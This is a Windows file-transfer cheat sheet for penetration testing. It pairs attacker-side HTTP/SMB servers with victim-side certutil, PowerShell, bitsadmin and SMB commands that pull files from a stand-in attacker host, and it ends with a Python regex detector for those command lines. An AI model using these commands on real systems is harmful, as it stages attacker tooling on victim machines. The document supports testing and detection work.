File Transfer (Windows)
Certutil
Attacker
python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80
Victim
certutil -f -urlcache -split http://192.168.1.2/file file
PowerShell
Attacker
python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80
Victim
powershell iwr -uri http://192.168.1.2/file -o file
powershell wget http://192.168.1.2/file -OutFile file
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/file', 'file')
Base64
Attacker
base64 -w0 secret.txt ;echo
RXN0byBlcyBjb24gdW5hIENNRA==
Victim
CMD
echo RXN0byBlcyBjb24gdW5hIENNRA== > out.tmp
certutil -decode out.tmp "C:\users\john\desktop\decode.txt"
PowerShell
[IO.File]::WriteAllBytes("C:\Users\john\desktop\decode.txt", [Convert]::FromBase64String("RXN0byBlcyBjb24gdW5hIENNRA=="))
BITSAdmin
Attacker
python -m SimpleHTTPServer 80
python3 -m http.server 80
php -S 0.0.0.0:80
Victim
bitsadmin.exe /transfer . http://192.168.1.2/file %cd%\file
#or
bitsadmin.exe /transfer . http://192.168.1.2/file C:\Users\user\Desktop\file
SMB
Attacker
impacket-smbserver a . -smb2support
Victim
copy \\192.168.1.2\a\file file
SMB (Auth)
Use an authenticated share when the unauthenticated copy fails with this error:
ERROR: You can’t access this shared folder because your organization’s security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
Attacker
impacket-smbserver a . -smb2support -username hacker -password Password1
Victim
C:\victim\> net use x: \\192.168.1.2\a /user:hacker Password1
C:\victim\> dir x:\
C:\victim\> copy x:\file file
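Detection
Every victim-side command above leaves a recognizable process command line (for example in Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled). The following is an added example, not part of the original page: a Python matcher that flags those command forms. The rule names are hypothetical, and the sample events are constructed from the commands listed here plus a few benign look-alikes.

```python
import re

# Rule names are hypothetical labels. Each regex targets one victim-side
# command form listed on this page and is matched case-insensitively.
RULES = [
    ("certutil_urlcache_download", r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://"),
    ("certutil_base64_decode", r"\bcertutil(\.exe)?\b.*[-/]decode\b"),
    ("bitsadmin_transfer", r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
    ("powershell_web_download",
     r"\bpowershell(\.exe)?\b.*\b(iwr|wget|curl|invoke-webrequest)\b.*https?://"),
    ("powershell_webclient", r"\bpowershell(\.exe)?\b.*net\.webclient.*\.downloadfile\("),
    ("powershell_base64_to_file", r"writeallbytes\(.*frombase64string\("),
    ("smb_unc_copy", r"\bcopy\s+\\\\[^\\\s]+\\[^\\\s]+\\\S+"),
    ("net_use_with_credentials", r"\bnet(\.exe)?\s+use\b.*\\\\\S+.*/user:"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def classify(command_line):
    """Return the name of every rule that the command line matches."""
    return [name for name, rx in COMPILED if rx.search(command_line)]


def scan(events):
    """Return (host, rule, command_line) for each hit in (host, command_line) events."""
    return [(host, rule, cmd) for host, cmd in events for rule in classify(cmd)]


# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"certutil -f -urlcache -split http://192.168.1.2/file file"),
    ("WS01", r'certutil -decode out.tmp "C:\users\john\desktop\decode.txt"'),
    ("WS02", r"powershell iwr -uri http://192.168.1.2/file -o file"),
    ("WS02", r"powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/file', 'file')"),
    ("WS03", r"bitsadmin.exe /transfer . http://192.168.1.2/file C:\Users\user\Desktop\file"),
    ("WS03", r"cmd.exe /c copy \\192.168.1.2\a\file file"),
    ("WS04", r"net use x: \\192.168.1.2\a /user:hacker Password1"),
    # Benign look-alikes that must not alert.
    ("WS05", r"certutil -hashfile C:\temp\setup.exe SHA256"),
    ("WS05", r"powershell Get-ChildItem C:\Users"),
    ("WS05", r"net use"),
]

if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{cmd}")
```

The `copy` and `echo` steps are cmd.exe built-ins, so they only appear in process logs when passed as arguments to a cmd.exe invocation, and the `WriteAllBytes` form is more reliably seen in PowerShell script block logging than in a process command line.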